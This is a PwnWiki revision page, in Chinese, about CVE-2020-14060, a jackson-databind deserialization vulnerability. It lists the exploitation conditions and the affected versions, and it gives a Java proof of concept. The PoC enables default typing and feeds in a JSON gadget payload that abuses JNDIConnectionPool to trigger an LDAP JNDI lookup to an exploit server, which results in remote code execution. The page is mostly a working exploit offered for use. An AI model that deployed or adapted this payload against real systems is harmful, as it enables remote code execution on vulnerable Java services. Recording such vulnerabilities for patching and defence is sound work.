Difference between revisions of "CVE-2020-14060 FasterXML jackson-databind 反序列化漏洞"
From PwnWiki
(Created page with "<languages /> <translate> ==利用條件== </translate> <translate> 開啟enableDefaultTyping() 使用了org.apache.drill.exec:drill-jdbc-all第三方依賴 </translate> <tr...") |
(Marked this version for translation) |
||
| Line 1: | Line 1: | ||
<languages /> | <languages /> | ||
<translate> | <translate> | ||
| − | ==利用條件== | + | ==利用條件== <!--T:1--> |
</translate> | </translate> | ||
<translate> | <translate> | ||
| + | <!--T:2--> | ||
開啟enableDefaultTyping() | 開啟enableDefaultTyping() | ||
| + | <!--T:3--> | ||
使用了org.apache.drill.exec:drill-jdbc-all第三方依賴 | 使用了org.apache.drill.exec:drill-jdbc-all第三方依賴 | ||
</translate> | </translate> | ||
<translate> | <translate> | ||
| − | ==影響版本== | + | ==影響版本== <!--T:4--> |
</translate> | </translate> | ||
<pre> | <pre> | ||
Latest revision as of 09:03, 17 June 2021
利用條件
開啟enableDefaultTyping()
使用了org.apache.drill.exec:drill-jdbc-all第三方依賴
影響版本
jackson-databind before 2.9.10.4 jackson-databind before 2.8.11.6 jackson-databind before 2.7.9.7
POC
package com.jacksonTest;
import com.fasterxml.jackson.databind.ObjectMapper;
import java.io.IOException;
public class Poc {
public static void main(String[] args) throws Exception {
ObjectMapper mapper = new ObjectMapper();
mapper.enableDefaultTyping();
String payload = "[\"oadd.org.apache.xalan.lib.sql.JNDIConnectionPool\",{\"jndiPath\":\"ldap://127.0.0.1:1099/Exploit\"}]";
try {
Object obj = mapper.readValue(payload, Object.class);
mapper.writeValueAsString(obj);
} catch (IOException e) {
e.printStackTrace();
}
}
}